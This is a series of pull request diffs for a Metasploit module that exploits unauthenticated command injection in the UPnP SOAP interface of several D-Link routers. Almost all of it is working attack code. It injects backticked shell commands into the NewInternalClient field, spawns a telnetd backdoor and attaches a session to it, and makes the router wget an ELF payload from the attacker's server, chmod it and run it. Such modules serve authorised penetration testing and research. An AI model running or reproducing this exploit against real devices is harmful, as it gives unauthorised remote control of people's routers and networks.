### PR TITLE
D-Link UPnP command injection

### DIFF
--- a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
@@ -59,31 +59,188 @@ class Metasploit3 < Msf::Exploit::Remote
 						'Platform' => 'unix'
 						}
 					],
-					[ 'Telnet',	#all devices
+					[ 'Telnet',	#all devices - default target
 						{
 						'Arch' => ARCH_CMD,
 						'Platform' => 'unix'
 						}
 					],
-					[ 'Linux mipsel Payload',	#DIR-865, DIR-645, and others with wget installed
+					[ 'Linux mipsel Payload',	#DIR-865, DIR-645 and others with wget installed
 						{
 						'Arch' => ARCH_MIPSLE,
 						'Platform' => 'linux'
 						}
 					],
 				],
-			'DefaultTarget'  => 0
+			'DefaultTarget'  => 1
 			))
 
 		register_options(
 			[
-				Opt::RPORT(49152),
+				Opt::RPORT(49152),	#port of UPnP SOAP webinterface
 				OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
 				OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
 				OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]),
 			], self.class)
 	end
 
+	def exploit
+		new_portmapping_description = rand_text_alpha(8)
+		new_external_port = rand(65535)
+		new_internal_port = rand(65535)
+
+		if target.name =~ /CMD/
+			exploit_cmd(new_external_port, new_internal_port, new_portmapping_description)
+		elsif target.name =~ /Telnet/
+			exploit_telnet(new_external_port, new_internal_port, new_portmapping_description)
+		else
+			exploit_mips(new_external_port, new_internal_port, new_portmapping_description)
+		end
+	end
+
+	def exploit_cmd(new_external_port, new_internal_port, new_portmapping_description)
+		if not (datastore['CMD'])
+			fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
+		end
+		cmd = payload.encoded
+		type = "add"
+		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
+		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ HTTP\/1.1,\ DIR/)
+			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
+		end
+		print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
+		type = "delete"
+		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
+		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ HTTP\/1.1,\ DIR/)
+			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
+		end
+		return
+	end
+
+	def exploit_telnet(new_external_port, new_internal_port, new_portmapping_description)
+		telnetport = rand(65535)
+
+		vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
+
+		cmd = "telnetd -p #{telnetport}"
+		type = "add"
+		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
+		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
+			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
+		end
+		type = "delete"
+		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
+		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
+			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
+		end
+
+		begin
+			sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
+
+			if sock
+				print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...")
+			else
+				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
+			end
+
+			print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}"
+			auth_info = {
+				:host   => rhost,
+				:port   => telnetport,
+				:sname => 'telnet',
+				:user   => "",
+				:pass	=> "",
+				:source_type => "exploit",
+				:active => true
+			}
+			report_auth_info(auth_info)
+			merge_me = {
+				'USERPASS_FILE' => nil,
+				'USER_FILE'     => nil,
+				'PASS_FILE'     => nil,
+				'USERNAME'      => nil,
+				'PASSWORD'      => nil
+			}
+			start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
+		rescue
+			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
+		end
+		return
+	end
+
+	def exploit_mips(new_external_port, new_internal_port, new_portmapping_description)
+
+		downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
+
+		#thx to Juan for his awesome work on the mipsel elf support
+		@pl = generate_payload_exe
+		@elf_sent = false
+
+		#
+		# start our server
+		#
+		resource_uri = '/' + downfile
+
+		if (datastore['DOWNHOST'])
+			service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
+		else
+			#do not use SSL
+			if datastore['SSL']
+				ssl_restore = true
+				datastore['SSL'] = false
+			end
+
+			#we use SRVHOST as download IP for the coming wget command.
+			#SRVHOST needs a real IP address of our download host
+			if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+				srv_host = Rex::Socket.source_address(rhost)
+			else
+				srv_host = datastore['SRVHOST']
+			end
+
+			service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
+
+			print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
+			start_service({'Uri' => {
+				'Proc' => Proc.new { |cli, req|
+					on_request_uri(cli, req)
+				},
+				'Path' => resource_uri
+			}})
+
+			datastore['SSL'] = true if ssl_restore
+		end
+
+		#
+		# download payload
+		#
+		print_status("#{rhost}:#{rport} - Asking the DLink device to take and execute #{service_url}")
+		#this filename is used to store the payload on the device
+		filename = rand_text_alpha_lower(8)
+
+		cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}; chmod 777 /tmp/#{filename}; /tmp/#{filename}"
+		type = "add"
+		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
+		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
+			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
+		end
+
+		# wait for payload download
+		if (datastore['DOWNHOST'])
+			print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the DLink device to download the payload")
+			select(nil, nil, nil, datastore['HTTP_DELAY'])
+		else
+			wait_linux_payload
+		end
+
+		register_file_for_cleanup("/tmp/#{filename}")
+
+		type = "delete"
+		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
+		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
+			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
+		end
+	end
 
 	def request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
 
@@ -138,153 +295,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		rescue ::Rex::ConnectionError
 			vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
 			return nil
-		end
-	end
-
-	def exploit
-		downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
-
-		new_portmapping_description = rand_text_alpha(8)
-		new_external_port = rand(65535)
-		new_internal_port = rand(65535)
-
-		if target.name =~ /CMD/
-			if not (datastore['CMD'])
-				fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
-			end
-			cmd = payload.encoded
-			type = "add"
-			res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
-			if (!res or res.code != 200)
-				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
-			end
-			print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
-			type = "delete"
-			res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
-			if (!res or res.code != 200)
-				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
-			end
-			return
-		end
-
-		if target.name =~ /Telnet/
-			telnetport = rand(65535)
-
-			vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
-
-			cmd = "telnetd -p #{telnetport}"
-			type = "add"
-			res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
-			if (!res or res.code != 200)
-				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
-			end
-			type = "delete"
-			res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
-			if (!res or res.code != 200)
-				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
-			end
-
-			begin
-				sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
-
-				if sock
-					print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...")
-				else
-					fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
-				end
-
-				print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}"
-				auth_info = {
-					:host   => rhost,
-					:port   => telnetport,
-					:sname => 'telnet',
-					:user   => "",
-					:pass	=> "",
-					:source_type => "exploit",
-					:active => true
-				}
-				report_auth_info(auth_info)
-				merge_me = {
-					'USERPASS_FILE' => nil,
-					'USER_FILE'     => nil,
-					'PASS_FILE'     => nil,
-					'USERNAME'      => nil,
-					'PASSWORD'      => nil
-				}
-				start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
-			rescue
-				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
-			end
-			return
-		end
-
-		#thx to Juan for his awesome work on the mipsel elf support
-		@pl = generate_payload_exe
-		@elf_sent = false
-
-		#
-		# start our server
-		#
-		resource_uri = '/' + downfile
-
-		if (datastore['DOWNHOST'])
-			service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
-		else
-			#do not use SSL
-			if datastore['SSL']
-				ssl_restore = true
-				datastore['SSL'] = false
-			end
-
-			#we use SRVHOST as download IP for the coming wget command.
-			#SRVHOST needs a real IP address of our download host
-			if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
-				srv_host = Rex::Socket.source_address(rhost)
-			else
-				srv_host = datastore['SRVHOST']
-			end
-
-			service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
-
-			print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
-			start_service({'Uri' => {
-				'Proc' => Proc.new { |cli, req|
-					on_request_uri(cli, req)
-				},
-				'Path' => resource_uri
-			}})
-
-			datastore['SSL'] = true if ssl_restore
-		end
-
-		#
-		# download payload
-		#
-		print_status("#{rhost}:#{rport} - Asking the DLink device to take and execute #{service_url}")
-		#this filename is used to store the payload on the device
-		filename = rand_text_alpha_lower(8)
-
-		cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}; chmod 777 /tmp/#{filename}; /tmp/#{filename}"
-		type = "add"
-		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
-		if (!res or res.code != 200)
-			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
-		end
-
-		# wait for payload download
-		if (datastore['DOWNHOST'])
-			print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the DLink device to download the payload")
-			select(nil, nil, nil, datastore['HTTP_DELAY'])
-		else
-			wait_linux_payload
-		end
-
-		register_file_for_cleanup("/tmp/#{filename}")
-
-		type = "delete"
-		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
-		if (!res or res.code != 200)
-			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
 		end
 	end
 

--- a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
@@ -105,13 +105,13 @@ class Metasploit3 < Msf::Exploit::Remote
 		cmd = payload.encoded
 		type = "add"
 		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
-		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ HTTP\/1.1,\ DIR/)
+		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
 		end
 		print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
 		type = "delete"
 		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
-		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ HTTP\/1.1,\ DIR/)
+		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
 		end
 		return

--- a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
@@ -85,51 +85,51 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		new_portmapping_description = rand_text_alpha(8)
-		new_external_port = rand(65535)
-		new_internal_port = rand(65535)
+		@new_portmapping_descr = rand_text_alpha(8)
+		@new_external_port = rand(65535)
+		@new_internal_port = rand(65535)
 
 		if target.name =~ /CMD/
-			exploit_cmd(new_external_port, new_internal_port, new_portmapping_description)
+			exploit_cmd
 		elsif target.name =~ /Telnet/
-			exploit_telnet(new_external_port, new_internal_port, new_portmapping_description)
+			exploit_telnet
 		else
-			exploit_mips(new_external_port, new_internal_port, new_portmapping_description)
+			exploit_mips
 		end
 	end
 
-	def exploit_cmd(new_external_port, new_internal_port, new_portmapping_description)
+	def exploit_cmd
 		if not (datastore['CMD'])
 			fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
 		end
 		cmd = payload.encoded
 		type = "add"
-		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
+		res = request(cmd, type)
 		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
 		end
 		print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
 		type = "delete"
-		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
+		res = request(cmd, type)
 		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
 		end
 		return
 	end
 
-	def exploit_telnet(new_external_port, new_internal_port, new_portmapping_description)
+	def exploit_telnet
 		telnetport = rand(65535)
 
 		vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
 
 		cmd = "telnetd -p #{telnetport}"
 		type = "add"
-		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
+		res = request(cmd, type)
 		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
 		end
 		type = "delete"
-		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
+		res = request(cmd, type)
 		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
 		end
@@ -168,7 +168,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		return
 	end
 
-	def exploit_mips(new_external_port, new_internal_port, new_portmapping_description)
+	def exploit_mips
 
 		downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
 
@@ -220,7 +220,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}; chmod 777 /tmp/#{filename}; /tmp/#{filename}"
 		type = "add"
-		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
+		res = request(cmd, type)
 		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
 		end
@@ -236,13 +236,13 @@ class Metasploit3 < Msf::Exploit::Remote
 		register_file_for_cleanup("/tmp/#{filename}")
 
 		type = "delete"
-		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
+		res = request(cmd, type)
 		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
 		end
 	end
 
-	def request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
+	def request(cmd, type)
 
 		uri = '/soap.cgi'
 
@@ -256,14 +256,14 @@ class Metasploit3 < Msf::Exploit::Remote
 			soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
 
 			data_cmd << "<m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
-			data_cmd << "<NewPortMappingDescription>#{new_portmapping_description}</NewPortMappingDescription>"
+			data_cmd << "<NewPortMappingDescription>#{@new_portmapping_descr}</NewPortMappingDescription>"
 			data_cmd << "<NewLeaseDuration></NewLeaseDuration>"
 			data_cmd << "<NewInternalClient>`#{cmd}`</NewInternalClient>"
 			data_cmd << "<NewEnabled>1</NewEnabled>"
-			data_cmd << "<NewExternalPort>#{new_external_port}</NewExternalPort>"
+			data_cmd << "<NewExternalPort>#{@new_external_port}</NewExternalPort>"
 			data_cmd << "<NewRemoteHost></NewRemoteHost>"
 			data_cmd << "<NewProtocol>TCP</NewProtocol>"
-			data_cmd << "<NewInternalPort>#{new_internal_port}</NewInternalPort>"
+			data_cmd << "<NewInternalPort>#{@new_internal_port}</NewInternalPort>"
 			data_cmd << "</m:AddPortMapping>"
 		else
 			#we should clean it up ... otherwise we are not able to exploit it multiple times
@@ -271,7 +271,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping"
 
 			data_cmd << "<m:DeletePortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
-			data_cmd << "<NewProtocol>TCP</NewProtocol><NewExternalPort>#{new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>"
+			data_cmd << "<NewProtocol>TCP</NewProtocol><NewExternalPort>#{@new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>"
 			data_cmd << "</m:DeletePortMapping>"
 		end
 

--- a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
@@ -80,8 +80,6 @@ class Metasploit3 < Msf::Exploit::Remote
 				OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
 				OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
 				OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]),
-				#OptString.new('TELNETUSER', [false, 'User to start the telnet daemon (default: random)' ]),
-				#OptString.new('TELNETPASS', [false, 'User to start the telnet daemon (default: random)' ])
 			], self.class)
 	end
 
@@ -89,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
 
 		uri = '/soap.cgi'
-		data_uri = "?service=WANIPConn1"
+		#data_uri = "?service=WANIPConn1"
 
 		data_cmd = "<?xml version=\"1.0\"?>"
 		data_cmd << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
@@ -170,15 +168,10 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 
 		if target.name =~ /Telnet/
-			#passw = datastore['TELNETPASS'] || rand_text_alpha(8)
-			#user = datastore['TELNETUSER'] || rand_text_alpha(4)
 			telnetport = rand(65535)
 
-			#vprint_status("#{rhost}:#{rport} - User: #{user}")
-			#vprint_status("#{rhost}:#{rport} - Password: #{passw}")
 			vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
 
-			#cmd = "telnetd -p #{telnetport} -l \"/usr/sbin/login\" -u #{user}:#{passw}"
 			cmd = "telnetd -p #{telnetport}"
 			type = "add"
 			res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
@@ -197,7 +190,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				if sock
 					print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...")
 				else
-					print_error("#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
+					fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
 				end
 
 				print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}"
@@ -205,8 +198,8 @@ class Metasploit3 < Msf::Exploit::Remote
 					:host   => rhost,
 					:port   => telnetport,
 					:sname => 'telnet',
-					#:user   => user,
-					#:pass	=> passw,
+					:user   => "",
+					:pass	=> "",
 					:source_type => "exploit",
 					:active => true
 				}
@@ -215,28 +208,12 @@ class Metasploit3 < Msf::Exploit::Remote
 					'USERPASS_FILE' => nil,
 					'USER_FILE'     => nil,
 					'PASS_FILE'     => nil,
-					#'USERNAME'      => user,
-					#'PASSWORD'      => passw
+					'USERNAME'      => nil,
+					'PASSWORD'      => nil
 				}
-				#taken from ./lib/msf/core/auxiliary/commandshell.rb
-				info = "TELNET (#{rhost}:#{telnetport})"
-				sess = Msf::Sessions::CommandShell.new(sock)
-				sess.set_from_exploit(self)
-				sess.info = info
-
-				# Clean up the stored data
-				sess.exploit_datastore.merge!(merge_me)
-
-				# Prevent the socket from being closed
-				self.sockets.delete(sock)
-				self.sock = nil if self.respond_to? :sock
-
-				framework.sessions.register(sess)
-				sess.process_autoruns(datastore)
-
-				sess
+				start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
 			rescue
-				print_error("#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
+				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
 			end
 			return
 		end

--- a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
@@ -124,15 +124,15 @@ class Metasploit3 < Msf::Exploit::Remote
 		data_cmd << "</SOAP-ENV:Envelope>"
 
 		begin
-			res = send_request_raw({
-				'uri'    => uri << data_uri,
-				#'vars_get' => {
-				#	'service' => 'WANIPConn1'
-				#},
+			res = send_request_cgi({
+				'uri'    => uri,
+				'vars_get' => {
+					'service' => 'WANIPConn1'
+				},
+				'ctype' => "text/xml",
 				'method' => 'POST',
 				'headers' => {
 					'SOAPAction' => soapaction,
-					'Content-Type' => "text/xml"
 					},
 				'data' => data_cmd
 			})
@@ -179,7 +179,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
 
 			#cmd = "telnetd -p #{telnetport} -l \"/usr/sbin/login\" -u #{user}:#{passw}"
-			cmd = "telnetd -p #{telnetport}"	# -l \"/usr/sbin/login\" -u #{user}:#{passw}"
+			cmd = "telnetd -p #{telnetport}"
 			type = "add"
 			res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
 			if (!res or res.code != 200)
@@ -200,7 +200,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					print_error("#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
 				end
 
-				print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}" # with #{user}:#{passw}"
+				print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}"
 				auth_info = {
 					:host   => rhost,
 					:port   => telnetport,

--- a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
@@ -40,6 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'References'  =>
 				[
 					[ 'OSVDB', '94924' ],
+					[ 'BID', '61005' ],
 					[ 'EDB', '26664' ],
 					[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-020' ]
 				],
@@ -64,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
 						'Platform' => 'unix'
 						}
 					],
-					[ 'Linux mipsel Payload',	#DIR-865, DIR-645, and some more
+					[ 'Linux mipsel Payload',	#DIR-865, DIR-645, and others with wget installed
 						{
 						'Arch' => ARCH_MIPSLE,
 						'Platform' => 'linux'
@@ -87,7 +88,6 @@ class Metasploit3 < Msf::Exploit::Remote
 	def request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
 
 		uri = '/soap.cgi'
-		#data_uri = "?service=WANIPConn1"
 
 		data_cmd = "<?xml version=\"1.0\"?>"
 		data_cmd << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"

--- a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
@@ -1,0 +1,319 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::Remote::HttpServer
+	include Msf::Exploit::EXE
+	include Msf::Exploit::FileDropper
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'        => 'D-Link UPnP SOAP Command Execution',
+			'Description' => %q{
+					Different DLink Routers are vulnerable to OS Command injection in the UPnP
+				SOAP interface.
+				Not every device includes wget which we need for deploying our payload.
+				On such devices you could use the telnet target for starting a telnet server or the
+				cmd generic payload and try to start telnetd or execute other commands. Since it is
+				a blind OS command injection vulnerability, there is no output for the executed
+				command when using the cmd generic payload. A ping command against a controlled
+				system could be used for testing purposes. This module has been tested successfully
+				on DIR-300, DIR-600, DIR-645, DIR-845, DIR-865 and DAP1522.
+			},
+			'Author'      =>
+				[
+					'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module
+					'juan vazquez' # minor help with msf module
+				],
+			'License'     => MSF_LICENSE,
+			'References'  =>
+				[
+					[ 'OSVDB', '94924' ],
+					[ 'EDB', '26664' ],
+					[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-020' ]
+				],
+			'DisclosureDate' => 'Jul 05 2013',
+			'Privileged'     => true,
+			'Platform'       => ['linux','unix'],
+			'Payload'        =>
+				{
+					'DisableNops' => true,
+				},
+			'Targets'        =>
+				[
+					[ 'CMD',	#all devices
+						{
+						'Arch' => ARCH_CMD,
+						'Platform' => 'unix'
+						}
+					],
+					[ 'Telnet',	#all devices
+						{
+						'Arch' => ARCH_CMD,
+						'Platform' => 'unix'
+						}
+					],
+					[ 'Linux mipsel Payload',	#DIR-865, DIR-645
+						{
+						'Arch' => ARCH_MIPSLE,
+						'Platform' => 'linux'
+						}
+					],
+				],
+			'DefaultTarget'  => 0
+			))
+
+		register_options(
+			[
+				Opt::RPORT(49152),
+				OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
+				OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
+				OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]),
+				OptString.new('TELNETUSER', [false, 'User to start the telnet daemon (default: random)' ]),
+				OptString.new('TELNETPASS', [false, 'User to start the telnet daemon (default: random)' ])
+			], self.class)
+	end
+
+
+	def request(cmd,type,newExternalPort,newInternalPort,newPortMappingDescription)
+
+		uri = '/soap.cgi'
+		data_uri = "?service=WANIPConn1"
+
+		data_cmd = "<?xml version=\"1.0\"?>"
+		data_cmd << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
+		data_cmd << "<SOAP-ENV:Body>"
+
+		if type == "add"
+			vprint_status("#{rhost}:#{rport} - adding portmapping")
+
+			sOAPAction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
+
+			data_cmd << "<m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
+			data_cmd << "<NewPortMappingDescription>#{newPortMappingDescription}</NewPortMappingDescription>"
+			data_cmd << "<NewLeaseDuration></NewLeaseDuration>"
+			data_cmd << "<NewInternalClient>`#{cmd}`</NewInternalClient>"
+			data_cmd << "<NewEnabled>1</NewEnabled>"
+			data_cmd << "<NewExternalPort>#{newExternalPort}</NewExternalPort>"
+			data_cmd << "<NewRemoteHost></NewRemoteHost>"
+			data_cmd << "<NewProtocol>TCP</NewProtocol>"
+			data_cmd << "<NewInternalPort>#{newInternalPort}</NewInternalPort>"
+			data_cmd << "</m:AddPortMapping>"
+		else
+			#we should clean it up ... otherwise we are not able to exploit it multiple times
